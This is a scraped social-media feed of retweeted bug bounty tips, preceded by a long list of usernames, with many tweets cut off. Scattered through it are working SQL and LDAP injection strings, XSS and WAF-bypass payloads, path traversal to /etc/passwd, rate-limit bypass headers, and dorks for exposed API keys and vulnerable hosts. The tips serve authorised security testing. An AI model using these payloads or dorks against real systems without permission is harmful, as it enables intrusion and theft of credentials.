from_user

TheMuztahidul

TheMuztahidul

ret2basic

xumut00_

700_isnuoT

sentinelleFr

VinayKu80824352

x_Hoque

sentinelleFr

noobie_maniac
700_isnuoT

sentinelleFr

sentinelleFr

sectest9

sentinelleFr

vanshitmalhotra

sentinelleFr

riomulyadi_

t1nd19d

Darkness_E1

realkartiks

sentinelleFr

sentinelleFr

jodelak
sentinelleFr

sectest9

sentinelleFr

sentinelleFr

UneekVivek

nafisaqil832

sectest9

618Slava

bsidesahmedabad

UneekVivek
micha3lb3n

UneekVivek

UneekVivek
Aj_louni

Savan_77

Maulik1827

IncScripts

SSXman2

WebSecurityIT

assasinflyer

nafisaqil832

javisenberg
cybersec_feeds

Zero0x00

arp_29

Haroldperkin250

seckteck

tech_naivi

tech_naivi

Bhagavan_bolli

ChavdaZeel
sectest9

pr0gr35528

pr0gr35528

pr0gr35528

jattboe
cry__pto

cry__pto

x_Hoque

aubrey_lab

AaronCuddeback
x_Hoque

x_Hoque

aubrey_lab

hacback17

x_Hoque

x_Hoque

x_Hoque

laud3b

x_Hoque

x_Hoque

x_Hoque
sec_onee

x_Hoque

msabhishek97

sec_onee

frankmosigisi

cybersec_feeds

good_sector
good_sector

good_sector
CYBerSec_Freak

mohitkchandani

cybersec_feeds

cybersec_feeds
cybersec_feeds

dan_covic

sectest9

Nutritionist_AP

nodeQuotesBot

Kill__3r

cybersec_feeds

bountyhunter_fr

bountyhunter_fr
bountyhunter_fr

bountyhunter_fr

Nutritionist_AP

bountyhunter_fr

bountyhunter_fr
bountyhunter_fr

bountyhunter_fr

TechSG2

TechSG2

dynamicCISO

OttLegalRebels

th3hokag3

SSXman2

SatyamGothi

bountyhunter_fr
cybersec_feeds

cybersec_feeds

bountyhunter_fr

cybersec_feeds

techtrendingnow
rudr4_sarkar

bountyhunter_fr
bountyhunter_fr

HarryHSolo

cybersec_feeds

__ceraunophile_

__ceraunophile_

GeekScripts

bountyhunter_fr

bountyhunter_fr

plzmakelstb4shp
saadibabar
saadibabar

saadibabar

l_y_n_s

bountyhunter_fr

bountyhunter_fr

ReaLentLess79
bountyhunter_fr

wareeq_shile

mhsecure

wareeq_shile

saintmalik_

TheBugBot
cybersec_feeds

JMakopolo

fayis_vadakkan

itsdig
priyanshu_xo

iamkamaljeet418

bountyhunter_fr

bountyhunter_fr
bountyhunter_fr

roughwire

hackd00r

CharuDutt8

s3rgiomazari3go

tanmayn36

vanshitmalhotra
vanshitmalhotra

vanshitmalhotra

TheBugBot

PoundXI

bountyhunter_fr

streaak
bountyhunter_fr
KomodoGT
Jaffy___

WebSecurityIT

ssh0x00r

bountyhunter_fr
tanmayn36

bountyhunter_fr
F3RR4R1_R3D
abagdadi
Anticlue

Nutritionist_AP

D0rkerDevil

bountyhunter_fr

Faeeqjalali
jayeshmthakur

AldenAous

AldenAous

k1ss_n00b

hacback17

0sninja
harshbothra_
dynamicCISO

theloshackers

enoleriiand

bountyhunter_fr

AldenAous

cybersec_feeds

bountyhunter_fr
cyanpiny
laud3b

bountyhunter_fr

ja1sharma
CristiVlad25

JAX_MASTERS

AldenAous

sectest9

fluttbot

pwn0sec

Ranger_one_

TechSG2

TechSG2
theInfernobot

TechSG2

TechSG2

hsakarp_ilajna
hsakarp_ilajna

AldenAous

AldenAous

KalemaChris

firearmslawyer

0x61_

cybersec_feeds

theInfernobot

xxx_BUGGY_xxx

jsfairy

jsfairy

bountyhunter_fr
sectest9

JMakopolo

hsakarp_ilajna

bountyhunter_fr

KKTech7

chickflow0

WebSecurityIT

GainSec

iambeingjoker

vatsav990
bountyhunter_fr

iambeingjoker

iambeingjoker

bountyhunter_fr

bountyhunter_fr

bountyhunter_fr

bountyhunter_fr

bountyhunter_fr

bountyhunter_fr

WebSecurityIT
HarryHSolo

nodeQuotesBot

bountyhunter_fr

BeingjokerMeme

iambeingjoker

bountyhunter_fr

bountyhunter_fr

bountyhunter_fr

bountyhunter_fr

bountyhunter_fr

bountyhunter_fr
bountyhunter_fr

Nutritionist_AP

TechSG2

Nutritionist_AP

Nutritionist_AP

TechSG2

aye_robot

TechSG2
TechSG2

aye_robot

sectest9

TechSG2

bountyhunter_fr
bountyhunter_fr

bountyhunter_fr

bountyhunter_fr

TechSG2

aye_robot
aye_robot

nlognbot

aye_robot

aye_robot

saurabh_sam96

iambeingjoker

nodeQuotesBot

bountyhunter_fr

bountyhunter_fr

vNature0

haknfuk
bountyhunter_fr

sectest9

MrrFawadkhann

sectest9

bountyhunter_fr

safe_buffer
bbuerhaus

bountyhunter_fr
F3RR4R1_R3D

sectest9

CristiVlad25

JohnSno99347035

KKTech7

AldenAous

AldenAous

AldenAous

Nutritionist_AP

Alra3ees
bountyhunter_fr

bountyhunter_fr

Ayhemalfakhri

iambeingjoker

roughwire

bountyhunter_fr

iambeingjoker

bountyhunter_fr
gkhck_
SatyamGothi
bountyhunter_fr

gdattacker

dhakal_ananda

0xfsec

HertzCar

bountyhunter_fr

bountyhunter_fr

iambeingjoker

BeingjokerMeme
dan_covic

V3NOM_10

good_sector

sec_onee

bountyhunter_fr
ajdumanhug
salahelhossiny0

ajdintrejic
KomodoGT
AldenAous

Virdoex_hunter
vishnugadupudi
cry__pto

bountyhunter_fr
0xrudrapratap
k1ss_n00b
Nutritionist_AP

niravsikotaria

CYBerSec_Freak

bountyhunter_fr

TechSG2

bountyhunter_fr
laud3b

bountyhunter_fr

bountyhunter_fr
bountyhunter_fr

laud3b

bountyhunter_fr

bountyhunter_fr

bountyhunter_fr

laud3b

bountyhunter_fr

bountyhunter_fr

bountyhunter_fr
laud3b

bountyhunter_fr
bountyhunter_fr

bountyhunter_fr

bountyhunter_fr

bountyhunter_fr
bountyhunter_fr

bountyhunter_fr

bountyhunter_fr

bountyhunter_fr

bountyhunter_fr

bountyhunter_fr
bountyhunter_fr

bountyhunter_fr

bountyhunter_fr

bountyhunter_fr
bountyhunter_fr

laud3b

bountyhunter_fr

bountyhunter_fr
bountyhunter_fr

bountyhunter_fr

bountyhunter_fr

Nutritionist_AP

bountyhunter_fr

Nutritionist_AP

skypatil98

pdnuclei
Monish91888822

bountyhunter_fr

mythicalcmd

streetofhacker

maverickNerd

bountyhunter_fr

_sickwiz

R4JVE3R

InonShkedy

MrrFawadkhann
amrul_01

AkaaZaan

bountyhunter_fr

ssh0x00r

ShieldVoC
BeingBharatiyaa
qw0lz

Nutritionist_AP

TechSG2
TechSG2

TechSG2
Debian_Hunter
PoundXI

bountyhunter_fr
could_10

vishne0

nodeQuotesBot

gmccane
s3rgiomazari3go

bountyhunter_fr

cyberdefender5

joeldeleep
bountyhunter_fr

Sudhans42246878

0xMiracle
makash
pdiscoveryio

bountyhunter_fr

INR_0x0Ma5K

ryan_kl_ko
sameh_9_

bountyhunter_fr

sh0mbo

Xiloe_Dev

saqibarif1998

knassar702

0x0Cj
sw33tLie
debangshu_kundu

rnd_infosec_guy

TebbaaX

bountyhunter_fr

hajiraess

BotInfosec

BotInfosec

BotInfosec

BotInfosec

BotInfosec

BotInfosec
BotInfosec

BotInfosec

BotInfosec
_0nk4r_

AniruddhaKl

AndyInfoSec_

Jhaddix

Rajat_sharma111
_seecko

ExploitedSystem

tanmayn36

HackerOn2Wheels

neutrinoguy

joselbr5
sriramoffcl

hacktory1

roughwire

pxmme1337
Xer0Days

bountyhunter_fr

Digitalsanjog

bountyhunter_fr

bountyhunter_fr

bountyhunter_fr

bountyhunter_fr

bountyhunter_fr

bountyhunter_fr
SaitejaB171

SaitejaB171

chiraggupta8769

AldenAous

frankmosigisi

ssh0x00r

SecSummers

imnirfn
xploitprotocol

xploitprotocol

xploitprotocol

ssh0x00r

Tyr4ntSec
sillydadddy

OAcybersecurity
sectest9

fiddlycookie
AldenAous
muhamme16102088

muhamme16102088

muhamme16102088

mirac_dasmine
muhamme16102088

stokfredrik

Jhaddix

0xMiracle
AndyInfoSec_

sectest9

AniruddhaKl

caseyjohnellis
GainSec

TechSG2
TechSG2

nodeQuotesBot

TechSG2

TechSG2

TechSG2

TechSG2

TechSG2

EvMd15

r3dw0lf_sec

Michael1026H1
Akash0x01

sectest9

syauqqii

thedarkwayg

ArthusuxD

sectest9

striveben

sectest9

t1nd19d
bountyhunter_fr

bountyhunter_fr

bountyhunter_fr

mirhatx

pdiscoveryio

sectest9

Nutritionist_AP

Nutritionist_AP

TrainingBug

TrainingBug

daoud_youssef

bountyhunter_fr
RustySowers

Securityblog

plenumlab

bountyhunter_fr

CyberRitesh

bountyhunter_fr
text
RT @renniepak: Pretty happy with this one-liner to extract endpoints from JavaScript file

cat [Link] | grep -oh "\"\/[a-zA-Z0-9_/?=&]*\"" | sed -e 's/^"//' -e 's/"$//' | s

#bugbountytips [Link]
RT @chiraggupta8769: shodan search org:"Target" [Link] --fields
#bugbountytips
#bugbountytip By @K4r1it0 [Link]
RT @pwntheweb: This is how I found sql-Injection 100% of the time
For [Link]

/?q=1
/?q=1'
/?q=1"
/?q=[1]
/?q[]=1
/?q=1`
/?q=1\
/?q=1/*'*/
/?q=1/*!1111'*/
/?q=1'||'asd'||' <== concat string
/?q=1' or '1'='1
/?q=1 or 1=1
/?q='or''='
#bugbounty #BugBountyTips

RT @0xElkot: Recon Tip for :

-Subdomain enumeration
-Finding endpoints
-Finding parameters
#bugbountytips #BugBounty #reconnaissance [Link]
RT @Naategh_: The number of zeros in [Link] doesn't matter, So we can use t
[Link]
[Link]
[Link]
...
#bugbounty #bugbountytips
RT @CharuDutt8: I just published How I was Able To bypass Cloudflare WAF [Link]
#bugbountytips @_abhichimbalkar @deep803937 @chevonphillip @dybtron
RT @AldenAous: Top 25 Remote Code Execution (RCE) Parameters

#bugbountytips #bugbountytip #bugbounty [Link] [Link]

RT @musiclouderlml: my first #bugbountytips ,
the company's mail system can be vulnerable to homographs IDN ,
try to ask reset password for victim@example-com to victim@exàmple-com , if the backe
RT @trbughunters: ️Top 25 XSS Dorks according to OpenBugBounty ‍
‍
️ ️‍♂️

#bugbountytips #bugbountytip #bugbounty #cybersecurity #infosec #ethicalhacking ht

RT @chiraggupta8769: ️Ways to bypass rate limit ️By @fuxksniper
️️

#ethicalhacking #bugbounty #bugbountytips #bugbountytip [Link]

RT @AldenAous: ⛓
️Get Reflected XSS within 3 minutes ⛓
️by:@gkhck_

[Link]

#cybersecurity #infosec #ethicalhacking #bugbounty #bugbountytips #bugbountytip

RT @cry__pto: Metasploit Community CTF 2020 [Link]:
[Link]

#Pentesting #Hacking #redteam #bugbountytips

RT @Bugcrowd: Want to make bug hunting your career, but hitting some blocks and uns

Take some tips and tricks from @ninad_mathpati in todays researcher spotlight! #ItTake
RT @TobiunddasMoe: My quick and basic recon routine for finding Subdomains while doi

#hackers #netsec #bugbountytip #bugbountytips #bugbounty #infosec #redteam #pen

RT @vanshitmalhotra: #BugBounty #BugBountyTip #bugbountytips #penetrationtesting
#hackers #informationdisclosure #owasp [Link]
#BugBounty #BugBountyTip #bugbountytips #penetrationtesting #pentesting #devops
#informationdisclosure #owasp [Link]
RT @gkhck_: To be more successful in bug bounty ...[I think] A short but very effective s

*Take a break, Learn more and Try again

[Link]

#bugbountytips #bugbountytip #infosec

RT @chiraggupta8769: ️Accessing the Admin Panel tip ️By @SalahHasoneh1
️️

#bugbounty #bugbountytips #bugbountytip [Link]

RT @pdnuclei: Done with subdomain enumeration? here is how you can get more assets

#hackwithautomation #assetdiscovery #recon #subdomains #bugbountytips [Link]

RT @mariusshoratau: Have you heard about AlienVault OTX? You can use it to get easy b

#bugbountytips #bugbountytip #bugbounty #cybersecurity #infosec #ethicalhacking ht

RT @jodelak: Github dorks for finding secret data..

#bugbountytips #Security #Network #infographics

#hacker #malware #cybercriminal #botnet #server #control #spam #hacking #Infosec
RT @r0bre: Proud to release ScriptFinder, a tool for automated JS file discovery!
[Link]
Thx to @TomNomNom @stokfredrik @hakluke @NahamSec @nnwakelam @zseano @EdO
#recon #hacking #infosec #bugbounty #bugbountytip #bugbountytips [Link]
RT @avasdream_: So here is my repository of dockerized pentesting tools. This comes in
[Link]
#Pentesting #Docker #Dockerfile #Containers #BugBounty #BugBountyTip #bugbounty
Github dorks for finding secret data..

#bugbountytips #Security #Network #infographics

#hacker #malware #cybercriminal #botnet #server #control #spam #hacking #Infosec
RT @emgeekboy: For all the hackers starting with bug bounty, here is how you can get r

#bugbountytips #recon #security

RT @_Rutik_Sangle_: #100daystolearnandimprove
Day 95:
1. Continued Solving some more Authentication labs on @WebSecAcademy

2. Read some Authentication Bypass blogs:

[Link]
[Link]
[Link]
[Link]

#infosec #bugbounty #bugbountytips

RT @Virdoex_hunter: web pentesting roadmap

[Link] @ADITYASHENDE17 @stokfredrik @NahamSec @nehatarick @m
RT @TheHackersNews: << Interesting Case Study >>

How Bug Bounty Platforms—HackerOne, Bugcrowd, Synack, Intigriti, and Zerocopter—R

[Link]

#infosec #pentest #bugbountytips #privacy #bugbountytip #cybersecurity #informatio

RT @gkhck_: #bugbountytips #infosec #bugbountytip

1 - Go Burp Suite / Target

2 - Select all items
3 - "Save selected items" (targets)
4 - [Link] -i targets -b -r ^/ -o cli [Link]
RT @knassar702: #PmG - Extract parameters/paths from urls

[Link]
#bugbountytips #recon [Link]
RT @618Slava: I often see that OSI knowledge is really needed!!
How much this knowledge is really needed? I can't find anything about their application
#BugBounty
#bugbountytips [Link]
I often see that OSI knowledge is really needed!!
How much this knowledge is really needed? I can't find anything about their application
#BugBounty
#bugbountytips [Link]
RT @Aj_louni: Just a quick reminder the AMA by @bsidesahmedabad with the humble lov
#bugbounty
#bugbountytips
#stream [Link]
RT @laud3b: Find SSRF issues via inject headers (like x-forwarded-host,..etc) with this
.
[Link]
#bugbountytips #bugbounty [Link]
Broken link hijacking!

#bugbounty #bugbountytips [Link]

RT @SalahHasoneh1: ️Dorks for CVE-2020-3452 ️
️️

#cybersecurity #infosec #ethicalhacking #bugbounty #bugbountytips #bugbountytip #

RT @m4ll0k2: When you find a public form (contact form,etc.) try these payloads (blind
Just a quick reminder the AMA by @bsidesahmedabad with the humble lovely @thedawg
#bugbounty
#bugbountytips
#stream [Link]
RT @cry__pto: DOM XSS in Gmail with a little help from [Link]:
[Link]
#bugbountytips #Pentesting #Hacking #redteam
RT @Zero0x00: Join us tonight at 9 pm for an intriguing live session with @thedawgyg
[Link]

Learn about tips & tricks about #bugbounty from his experience!
"Walla" "walla"
Bada maza ane wala hai !!!!
Do join us :)

#bugbountytips #hacking [Link]

RT @fayis_vadakkan: How to Bypass The Rate limiting✌️✌️

Add this header in to the post request with an IP address.

X-Forwarded-For: (Any IP Address )

#bugbountytips #bugbounty #vulnerability #Hackers #exploit

️RT @AldenAous: ️Top 25 Local File Inclusion (LFI) Parameters 🛡️

#bugbountytips #bugbountytip #bugbounty #cybersecurity #infosec #ethicalhacking #

RT @SalahHasoneh1: ️Using the password reset code more than once ️
️️

#cybersecurity #infosec #ethicalhacking #bugbounty #bugbountytips #bugbountytip ht

RT @laud3b: CloudFlare Origin Certificate

How to find out the real server IP hidden behind the Cloudflare CDN

[Link].common_name: CloudFlare Origin Certificate

#bugbountytips #bugbounty
RT @manas_hunter: Github dorks for finding secret data..
Happy hacking:)

#bugbountytips #infosec [Link]

RT @s3rgiomazari3go: Sublist3r is a tool designed to enumerate subdomains of website
[Link]
#cybersecurity #hackingtools #bugbountytips [Link]
RT @SalahHasoneh1: ️Ways to bypass rate limit ️
️️

#cybersecurity #infosec #ethicalhacking #bugbounty #bugbountytips #bugbountytip #

Join us tonight at 9 pm for an intriguing live session with @thedawgyg on @bsidesahm
[Link]

Learn about tips & tricks about #bugbounty from his experience!
"Walla" "walla"
Bada maza ane wala hai !!!!
Do join us :)

#bugbountytips #hacking [Link]

RT @harshbothra_: It was great to have a talk with @dynamicCISO. In case if you misse

Slides: [Link]

Stream: [Link]

Thanks, @hacback17 for carrying this out.

#bugbountytips #bugbounty #websecurity #hacking #recon #bugcrowd

RT @laud3b: You can change WPEngine's config file on the WordPress blogs. Path "/_wp
#bugbountytips #bugbounty [Link]
RT @Jhaddix: Monday Night #BugBounty #bugbountytips

- Found 2 sites with source code disclosure via git.

- Struggled with git for a long while to extract files from objects.
- Audited some PHP
- Frustrated with git, going to bed =P
RT @bbuerhaus: Once I realized the trick to @adamtlangley's "I once was blind but now

TIL @PortSwigger's Burp Collab does SMTP!

This is insaaanely useful.

#bugbounty #bugbountytips [Link]

RT @AldenAous: Recon Tip for :
-Subdomain enumeration
-Finding endpoints
-Finding parameters By @0xElkot

#bugbountytips #BugBounty #bugbountytip [Link] [Link]

RT @SalahHasoneh1: ️Accessing the Admin Panel tip ️
️️

#cybersecurity #infosec #ethicalhacking #bugbounty #bugbountytips #bugbountytip #

RT @terjanq: I created a repository to keep track of cool XSS payloads [Link]

Check this out!

#xss @XssPayloads #bugbountytips [Link]

RT @dhakal_ananda: Wanna know the best way to be demotivated in the bug bounty fie

Compare yourself with others!

#bugbounty #bugbountytips
RT @chiraggupta8769: Github Dorks For Finding Information Using Extension By @D0rke

#bugbounty #bugbountytip #bugbountytips [Link]

RT @chiraggupta8769: <?php var_dump(explode(',',ini_get('disable_functions'))); ?&

Handy as hell tip for checking which functions you need to by pass on PHP RCE.

Tip By @Random_Robbie

#bugbountytips #bugbountytip #bugbounty

RT @chiraggupta8769: Recon Tip for :
-Subdomain enumeration
-Finding endpoints
-Finding parameters By @0xElkot

#bugbountytips #BugBounty #bugbountytip [Link]

RT @intigriti: Did you know you can get the source code of Electron apps by using this h
Metasploit Community CTF 2020 [Link]:
[Link]

#Pentesting #Hacking #redteam #bugbountytips

DOM XSS in Gmail with a little help from [Link]:
[Link]
#bugbountytips #Pentesting #Hacking #redteam
RT @XSaadAhmedX: BugBountyTip: If you playing with `API ENDPOINT` always try to s

#bugbountytip #bugbountytips #bugbounty [Link]

RT @rapiddns: shodan dork

title:"SSL VPN Service"

"webvpnlogin=1"

Happy Hacking!
#bugbountytip #bugbountytips #bugbounty #cisco #vulnerability [Link]
RT @hacback17: Hey, wanna learn #Python? "Automate The Boring Stuff" course is #Fre

[Link]
Coupon Code: COPSHOTMEINPORTLAND

#hack #girlswhocode #linux #security #bugbounty #bugbountytips #linux #programm

RT @xalerafera: #bugbountytips #hackerone #bugbounty #recon

Find api links in subdomains, or how to find a simple SSRF in five minutes in a big compa

assetfinder --subs-only [Link] | waybackurls | grep "?url="

Happy hacking [Link]

RT @11xuxx: Horizontal priv escalation & full account takeover
1. registered a new user for my company at "/api/register/48e33445-f797-4e62-801f-e
2. changed the UUID to a numerical value -> "2"
3. user created under another company
4. full account takeover
#bugbountytips [Link]
RT @amanmahendra_: Shodan dork for CVE-2020-3452

“Set-Cookie: webvpn;”

#bugbounty #bugbountytips #bugbountytip #hackerone #bugcrowd #togetherwehithar

Hey, wanna learn #Python? "Automate The Boring Stuff" course is #Free for today with

[Link]
Coupon Code: COPSHOTMEINPORTLAND

#hack #girlswhocode #linux #security #bugbounty #bugbountytips #linux #programm

RT @MrCyberwarrior: Privilege Escalation
#bugbounty #BugBountyTips [Link]
RT @11xuxx: Wildcard bypass & LFI
1. Intercepted a POST req that pointed to a local file "/usr/local/redacted/filename"
2. tried "/etc/passwd" -> bad request
3. "/user/local/../../etc/passwd" -> bad request
4. "/user/local/redacted/../../../etc/passwd" -> OK
5. LFI & bounty

#BugBountyTips [Link]
RT @iambharat18: #BugBountyTips #bugbounty #SharingIsCaring Bug: 2FA Bypass-&gt
-- Sometimes "0000" can give the correct OTP response for every account and redirect y
You can change WPEngine's config file on the WordPress blogs. Path "/_wpeprivate/con
#bugbountytips #bugbounty [Link]
RT @poison_h1: This tip may be posted by someone before. However, I encountered this
#BugBountyTip #BugBountyTips #infosec [Link]
RT @avanish46: After 2 days of struggling, Bypassed a strong XSS filter on one of the pr
[ No '>' was allowed , no Html tags, Character length 35 ]
XSS Payload used :-
<svg onload="alert(1)" <="" svg=""
@XssPayloads
#BugBountyTips #BugBounty [Link]
RT @_heinthant: Got a survey from?
Don't only test for blind xss
Try this once

#bugbountytips [Link]
RT @Virdoex_hunter: SSRF one liner Command(both mannual & automatic) and tip
More SSRF tips:
[Link] #bugbountytip #bugbountytips
@ADITYASHENDE17 @1ndianl33t @stokfredrik @dhakal_ananda @remonsec @trippy_bh
RT @alicanact60: Don't forget to check the responses. Maybe you can find some tokens l
I found a token in response and went to mailbox. The email verification link was xx+.com
And I saw they are same tokens!
#BugBountyTips #BugBountyTip [Link]
RT @SatyamGothi: NEW VIDEO ALERT🚨
Your Sunday dose of Information📖
The next one on the series, Identifying Technologies for your Targets!

[Link]

Trying to make sort of a Beginner friendly #BugBountyCourse! Do check it out❤️

Hope it helps :)
#bugbountytips #bugbounty
RT @stokfredrik: HOURS & HOURS OF FREE CYBER SECURITY TRAINING??? (im loo

August is going to be.. crazy!

feat: @Hacker0x01 @defcon @redteamvillage @AppSec_Village @Bugcrowd @secarmyof
#bugbounty #bugbountytips #appsec #infosec [Link]
i was testing for ssti on this page using this payload {{9-3}} and this the output am get
#bugbountytips
#bugbounty [Link]
RT @PoundXI: Two good articles about HTTP Request Smuggling.
[Link]://[Link]/trsGgcBCOg
[Link]://[Link]/BwoMkuigWi
#cybersecurity #bugbounty #bugbountytips
RT @Queseguridad: When auditing a SAP it is important to have a good dictionary, as it
RT @HusseiN98D: SSRF script requested by @Alra3ees
This script will take a domain and a callback server, append SSRF parameters and fire th
#BugBountytip #BugBountytips #BugBounty [Link]
RT @m4ll0k2: I found a lot SSRF issues via inject headers (like x-forwarded-host,..etc) w
[Link]
By @hakluke

Will be helpful for new bug bounty hunters. Watch it out.

#bugbounty #bugbountytips #cybersecurity

RT @maverickNerd: I just published Android App Security & Testing [Link]

It was long pending, found a draft in my notes, corrected it and thought why not share i

#androidsecurity #bugbountytips #bugbounty

RT @vanshitmalhotra: #BugBounty #BugBountyTip #bugbountytips #penetrationtesting
#hackers #informationdisclosure #owasp [Link]
RT @vanshitmalhotra: #BugBounty #BugBountyTip #bugbountytips #penetrationtesting
#hackers #informationdisclosure #owasp [Link]
RT @vanshitmalhotra: #BugBounty #BugBountyTip #bugbountytips #penetrationtesting
#hackers #informationdisclosure #owasp [Link]
RT @lutfumertceylan: 🚀 How can you make a Javascript Polyglot for XSS? 🚀

#BugBounty #bugbountytips #bugbountytip #CyberSecurity #infosec #hacked https://

RT @harshbothra_: XSS is pure love and combined with luck, it may give unexpected res

#bugbountytips #bugbounty #hacking #bugbountywriteups #security

RT @HackerHumble: OTP Verification bypass #5

1. Web app is sending a verification code to email before changing some sensitive fields

2. Intercepted the request in burp and found the email parameter (eg: email: victim@gm

#bugbountytips #bugbounty #hacking

RT @Kill__3r: Noob question?
need help.
when I try to evaluate javascript: and eval: functions it is saying access to this page is d
#bugbountytips #bugbounty [Link]
Noob question?
need help.
when I try to evaluate javascript: and eval: functions it is saying access to this page is d
#bugbountytips #bugbounty [Link]
RT @CristiVlad25: What I consider the top two learning and testing books for #pentestin

#cybersecurity #bugbountytips #penetrationtesting

[Link]
RT @ShMalav: #bugbountytips
#bugbountytip
Subdomain Enumeration tip

Install [Link]
run this tool and get [Link] as a result .
Now
Run subfinder from project discovery and use that file

subfinder -d domain_com -o [Link] -nW -v -rL [Link]

😉 😉😉😉

RT @thedarkwayg: Yesterday I sent 5 submissions to @Bugcrowd .

Results: 2 Triaged, 3 Dups 😂😅.

WAF Bypass payload:

">'><details/open/ontoggle=confirm('XSS')>

#BugBountyTips #BugBounty [Link]

RT @_Y000_: #Dork para encontrar paginas vulnerables a #xss

Este ataca una #vulnerabilidad de un tema de #wordpress, el cual se llama: Fruitful

intext:"Fruitful theme by fruitfulcode Powered by: WordPress" intext:"Comment" intext

#CyberSecurity #hacked #bugbountytips [Link]

RT @_Y000_: Este es para encontrar dispositivos iCloud vulnerables, podemos ver todas

intitle:"Index Of" intext:"iCloud Photos" OR intext:"My Photo Stream" OR intext:"Camer

*Nota: pueden modificar los parámetros otros resultados

#Cybersecurite #dork #bugbountytips [Link]

RT @shreyasrx: LDAP Injection 💥

1/3

Payloads :
*
*)(&
*))%00
)(cn=))\x00
*()|%26'
*()|&'
*(|(mail=*))
*(|(objectclass=*))
*)(uid=*))(|(uid=*
*/*
*|
/
//
//*
@*
|
admin*
admin*)((|userpassword=*)
admin*)((|userPassword=*)
x' or name()='username' or 'x'='y

#bugbountytips
#shieldindia

RT @rohit_sonii: Escalating Self XSS to Account Takeover by chaining multiple low level
[Link]

#bugbountytips #bugbountytip #bugbounty #infosec #togetherwehitharder

RT @manas_hunter: #bugbountytips
#bugbounty
#infosec [Link]
RT @GochaOqradze: #bugbountytip #bugbountytips
Today I bypass F5-Big waf with xss payload.

Interesting is %5K converted to "P" character.

In response source I got

"><P/onweel=alert(1)>mouse wheel here<!--

Payload:
%22%3e%3c%5K/onwheel=alert(1)%3emouse%20wheel%20here%3c%21--
RT @y0dhha: XSS Cheat Sheet
#xss #bugbounty #exploit #BugBountyTips #BugBountyTip [Link]
RT @zedsec009: Cloudflare bypass & template injection to XSS in one shoot !

{{x = {'y':''.[Link]}; x['y'].charAt=[].join;$eval('x=alert(1)');}}

#bugbountytips
RT @0xVeera: Private Profile Disclosure - going beyond /wp-json/
The site was using Wordpress
I found various bypass techniques to access private user information.
#bugbountytips @Bugcrowd @SynackRedTeam
Thanks to @ADITYASHENDE17 @u1tran00b @upen1994 [Link]
RT @hacback17: It was a fantastic session loaded with lots of live examples. Thank you

Video: [Link]

Slides: [Link]

#bugbounty #bugbountytips #security #infosec #ciso #hacker #girlswhocode #linux #

RT @th3hokag3: Bug Bounty Tip:

#bugbounty #bugbountytips #bugbountytip #infosec #cybersecurity [Link]

Bug Bounty Tip:

#bugbounty #bugbountytips #bugbountytip #infosec #cybersecurity [Link]

RT @trbughunters: ️Find Passwords, Exposed Log Files with Google Dorks ️
️️

#bugbountytips #bugbountytip #bugbounty #cybersecurity #infosec #ethicalhacking #

NEW VIDEO ALERT🚨
Your Sunday dose of Information📖
The next one on the series, Identifying Technologies for your Targets!

[Link]

Trying to make sort of a Beginner friendly #BugBountyCourse! Do check it out❤️

Hope it helps :)
#bugbountytips #bugbounty
RT @intigriti: How can you leverage out of scope domains without breaking a program's
@healthyoutlet enumerates OOS subdomains & creates a wordlist to use for in-scop
RT @AldenAous: 🚀💡 XSS from another level 💡🚀
[Link]

#BugBounty #bugbountytips #bugbountytip #CyberSecurity #infosec

RT @hackd00r: Subscribe to our Telegram Channel for Hackdoor Cyber Security Events a
🤖🤖🔥🔥👾👾👇👇👇

[Link]

#BugBounty #BugBountyTip #bugbountytips #penetrationtesting #pentesting #devops

RT @securestep9: Stuck at home due to Coronavirus? It is a great time to learn about fin

Here's a great collection of write-ups collected by @PentesterLand from 2012 to 2020:

#BugBountyTips
#BugBountyWriteups

[Link] [Link]
RT @hsakarp_ilajna: comments in the source code
google hacking
Wayback Machine
IPs
shodan
Censys
Whois
Similar Domains
#Searching Social Media
VPN provider
#S3 Bucket Enumeration
#Emails
#GITHUB recon
#Subdomains

#bugbountytips   #bugbounty
#infosec #bugbountytip
#osnit_tool #cybersecurity

RT @KomodoGT: [Link] MR [Link] >>> #blockchain #open

RT @D0rkerDevil: #bugbountytips
webarchive > found email change unconfirmed link > checked source > found e

at this point i cannot change the mail of he user as it won't be good for the user

reported

#bugbounty #security
RT @farah_hawa01: NEW VIDEO: In this video, I explain how JWTs work and how to att
[Link]
RT @micha3lb3n: Just gimme a list of urls or a url, I can do the following :

1. Extract all the hidden endpoints from the source.

2. Filter out live domains
3. Brute force endpoints with a word list.

And all these really fast

says SourceWolf.

[Link]

{..}

#bugbountytips

RT @iambeingjoker: How to Answer tricky Javascript Interview Questions | Weird Javas

#javascript #hacking #interview #coding #bugbountytips #bughunting #tipsandtricks #

#programfolback #tutorial #code #opensource
RT @SalahHasoneh1: ️Top 10 - GitHub Dorks for Finding API Keys ️
️️

Rebuilt in a better way

#cybersecurity #infosec #ethicalhacking #bugbounty #bugbountytips #bugbountytip ht

RT @roughwire: Cache Poisoning on Wordpress --> Stored XSS --> POST "/wp-ad

Triaged with "High" instead of "Critical" . Don't know what is wrong !

#bugbountytips Tweet has tip as well :D

RT @laud3b: Shellshock still work for some server you can also try
nmap script.
Nmap -sV -sC -v -T4 --script http-shellshock -p 443,80 <target>
#bugbountytips #bugbounty [Link]
RT @D4Vinci1: Just published a script that fingerprint BigIP servers in a given list of dom
link:
[Link]
#bugbounty
#bugbountytips
#Pentesting #bigip #F5 [Link]
RT @manas_hunter: Bypassing 2FA with CSRF.

Apply this for easy bounties:)

#bugbountytips [Link]
RT @K4r1it0: shodan search org:"Target" [Link] --fields ip_str,po
#bugbountytips
#bugbountytip [Link]
RT @intigriti: Want to find critical bugs by changing a single header? Do just like @hacke
RT @_mkahmad: Account Takeover by JWT Token forging by me :) #bugbountytips #bu
RT @fuxksniper: GraphQL — Common vulnerabilities & how to exploit them:
[Link]

Understanding Graphql :
[Link]

Some good graphql stuff

(Not by me)
#bugbountytips #bugbountytips
RT @D0cK3rG33k: GiHub Dorks for Finding API Keys, Tokens and Passwords
api_key
“api keys”
authorization_bearer:
oauth
auth
authentication
client_secret
api_token:
“api token”
client_id
password
user_password
user_pass
passcode
client_secret
secret
password hash
OTP
user auth
#bugbountytips

RT @AldenAous: Account Takeover tips 👀👍🏻

#bugbountytips #bugbountytip #WhiteHats #wafbypass #bugbounty [Link]
RT @TheHackersNews: Watch Out 🔥

Hackers are abusing #Google Analytics service to bypass CSP web-security feature and

Learn how it works — [Link]

#infosec #cybersecurity #bugbountytips #bugbountytip [Link]

RT @intigriti: Excellent e-mail address payloads by @securinti! 🤯
Rewatch "You've got pwned: exploiting e-mail systems" at #NahamCon here: [Link]
